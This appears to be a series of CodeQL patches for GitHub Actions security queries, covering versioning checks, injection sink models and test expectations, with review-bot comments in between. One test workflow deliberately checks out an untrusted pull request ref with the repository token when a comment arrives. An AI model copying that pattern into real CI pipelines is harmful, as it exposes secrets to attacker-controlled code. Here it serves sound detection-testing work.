diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 49cee7772c0a..09aed9e34a10 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -47,5 +48,7 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6b2735181674..3b2e5eb9de81 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -276,6 +276,9 @@ edges | .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | | .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | +| .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From b6a26e76d4c3bece2bcee0d58c8b69cc0390be7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:03:11 +0200 Subject: [PATCH 622/707] New azure models --- ql/lib/ext/manual/azure_cli.model.yml | 7 +++++++ ql/lib/ext/manual/azure_powershell.model.yml | 1 + 2 files changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/azure_cli.model.yml diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml new file mode 100644 index 000000000000..dcf1de044aaf --- /dev/null +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"] 
diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index e050b61815e5..a2d08f93928a 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -3,4 +3,5 @@ extensions: pack: github/actions-all extensible: actionsSinkModel data: + - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] From dbcf113546430d68a479f0766124576f46e024a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:04:01 +0200 Subject: [PATCH 623/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1af220ff8fb7..a818ba5362aa 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.75 +version: 0.1.76 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8098e4f2156..fe6bdb0d77e9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.75 +version: 0.1.76 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9b1cd2c02ff6b6cebec5c8c34e296a10e768eb9 Mon Sep 17 00:00:00 2001 
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:16:43 -0400 Subject: [PATCH 624/707] add workflow to catch some ineligible wildcards and eligible latest version for immutable actions --- .../UseOfUnversionedImmutableAction.qll | 15 ++++++-- .../workflows/issue_comment_octokit2.yml | 38 +++++++++++++++++++ .../UnversionedImmutableAction.expected | 3 ++ 3 files changed, 53 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 3f65a2ffc72c..2fd47e3f8e19 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,11 +6,20 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - isNotSemVer(this.getVersion()) + not isSemVer(this.getVersion()) } } bindingset[version] -predicate isNotSemVer(string version) { - not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") + + // or N or N.x or N.N.x with optional v prefix + or version.regexpMatch("^v?[1-9]\\d*$") + or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") + or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") + + // or latest which will work + or version = "latest" } 
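Review bot: The three short-form patterns in `isSemVer` require the major version to start with `[1-9]`, so `v0`, `v0.3` and `v0.x` are reported as unversioned even though the full three-part pattern on the line above accepts `0.3.1`, and the predicate this replaces (`^(v)?[0-9]+(\.[0-9]+)*(\.[xX])?$`) accepted them too; zero-major tags are common for pre-1.0 actions. Using `(0|[1-9]\\d*)` for the major component in the three `or` branches makes them consistent with the SemVer pattern, e.g. `or version.regexpMatch("^v?(0|[1-9]\\d*)$")`. If zero-major tags are deliberately excluded, a comment on those lines should say so, since the change in behaviour is not mentioned in the commit. The `^`/`$` anchors are redundant under `regexpMatch`, which already matches the whole string, but harmless.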
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml new file mode 100644 index 000000000000..84081fef5d06 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -0,0 +1,38 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR minor and patch wildcard + uses: octokit/request-action@v2.x.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor patch wildcard + - uses: actions/checkout@v2.x.xx + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor wildcard incomplete patch + uses: actions/checkout@v2.x. + - name: Run latest action + uses: some-action/some-repo@latest + with: + some-input: some-value + - name: run the latest checkout action + uses: actions/checkout@latest \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 5ae46862fb43..3aa7d6d654ec 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
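Review bot: The step named "Checkout PR minor patch wildcard" does not exercise what its name says: `- name: Checkout PR minor patch wildcard` and `- uses: actions/checkout@v2.x.xx` are two separate list items, so the first is a step with neither `uses` nor `run` and the second is an anonymous step — the expected output confirms it, reporting line 27 as an unnamed `Uses Step`. Dropping the dash gives a single step: `uses: actions/checkout@v2.x.xx` aligned under `name:`. Removing the extra item shifts every following line, so `UnversionedImmutableAction.expected` will need regenerating. The file also lacks a trailing newline.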
@@ -4,6 +4,9 @@ | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | | .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow 
is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | From 1c6d346f5343b115ec70c40e0852c70be052c52b Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:24:12 -0400 Subject: [PATCH 625/707] change ql message --- .../CWE-829/UnversionedImmutableAction.ql | 2 +- .../UnversionedImmutableAction.expected | 44 +++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index 0c6443bc3e64..0bc571ad4734 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -15,5 +15,5 @@ import codeql.actions.security.UseOfUnversionedImmutableAction from UnversionedImmutableAction step select step, - "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + "The workflow is using an eligible immutable action ($@) without semantic versioning", step, step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 3aa7d6d654ec..df23709b5422 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -1,22 +1,22 @@ -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | -| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | 
actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | -| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | -| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | -| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | -| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | 
.github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | -| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is 
using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | 
Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | 
.github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | From df0c1e28e713c83b2a29f97bc6aaa6fa199c1c0e Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:49:43 -0400 Subject: [PATCH 626/707] stub out qlhelp --- .../Security/CWE-829/UnversionedImmutableAction.md | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index eab708f8602e..754fe75b62be 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md 
@@ -1,27 +1,29 @@ -# Unpinned tag for 3rd party Action in workflow +# Unversioned Immutable Action ## Description -Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples ### Incorrect Usage ```yaml -- uses: tj-actions/changed-files@v44 +- uses: actions/checkout@some-tag +- uses: actions/checkout@2.x.x ``` ### Correct Usage ```yaml -- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +- uses: actions/checkout@4.0.0 ``` ## References -- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) +- [Consuming immutable actions]() From f7162228012cb27341f759c9d05fdeb3c554bba0 Mon Sep 17 00:00:00 2001 
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:27:53 -0400 Subject: [PATCH 627/707] remove octokit from trusted orgs for now - reduce PR scope --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 2111cc118a97..10c21bc368b5 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 030c08e5aee4f5138dc8b9bd670fe3afd7fb1019 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:54:27 -0400 Subject: [PATCH 628/707] update expected from example originating from main branch merge --- .../Security/CWE-829/UnversionedImmutableAction.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index df23709b5422..6d30e6f4cbeb 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
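Review bot: `isTrustedOrg` carries no QLDoc, so the criterion behind the three remaining organizations, and why a repository under them is exempt from the pinned-commit check, has to be inferred from the query's 'Unpinned 3rd party Action' message (visible in UnpinnedActionsTag.expected later on this page). Propose `/** Holds if repo is owned by an organization treated as first-party, so its actions are not reported as unpinned 3rd-party actions. */` above the `bindingset`. `isPinnedCommit`, shown in the hunk header, and the `from` clause that uses both predicates lie outside the hunk.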
@@ -20,3 +20,4 @@ | .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout | From 40ec9d623d71afedc0cd0bdd64be30d987790bfe Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:55:44 -0400 Subject: [PATCH 629/707] update existing tests to accomdate for trips from octokit2 example added to support unversioned immutable action ql --- .../Security/CWE-829/UnpinnedActionsTag.expected | 3 +++ .../Security/CWE-829/UntrustedCheckoutCritical.expected | 6 ++++++ .../Security/CWE-829/UntrustedCheckoutHigh.expected | 1 + 3 files changed, 10 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0457fd7afaac..aa19c08f2f06 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
